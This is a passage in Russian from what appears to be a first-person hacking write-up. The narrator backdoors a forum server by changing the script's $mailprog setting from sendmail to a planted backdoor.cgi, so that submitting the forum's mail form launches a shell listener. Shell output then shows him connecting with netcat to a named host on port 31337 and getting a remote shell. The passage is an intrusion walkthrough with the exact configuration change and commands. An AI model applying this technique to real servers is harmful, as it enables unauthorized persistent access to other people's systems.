Переменная $mailprog определяла программу, запускаемую для отсылки почты, а $mailtype уточняла, что отсылку будет осуществлять именно sendmail (из переменной $mailprog). После моего вмешательства строка:

$mailprog = "/usr/sbin/sendmail";

# Location of your sendmail program

приобрела вид:

$mailprog = "/home/n/navy/public_html/cgi-bin/backdoor.cgi";

# Location of your sendmail program

И как же теперь выполнить бэкдор? Очень просто. Я вышел из бэкдора и проверил, закрылся ли он:

sh-2.05# ps

  PID TTY          TIME CMD

 1376 tty1     00:00:00 login

 1466 tty1     00:00:00 bash

 2028 tty1     00:00:00 bs.pl

 2076 tty1     00:00:00 sh <defunct>

 2079 tty1     00:00:00 sh <defunct>

 2081 tty1     00:00:00 sh <defunct>

 4320 tty1     00:00:00 sh

 4969 tty1     00:00:00 ps

sh-2.05# killall bs.pl

sh-2.05# exit

[navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337

[navy@Fortress /home/navy]#

Зашёл на главную страницу форума, промотал страницу вниз, и увидел там формочку:

Ввёл имя юзера Navy, нажал enter. Полоса загрузки браузера начала медленно ползти. Вернувшись к консоли, я ввёл:

[navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337

sh: no job control in this shell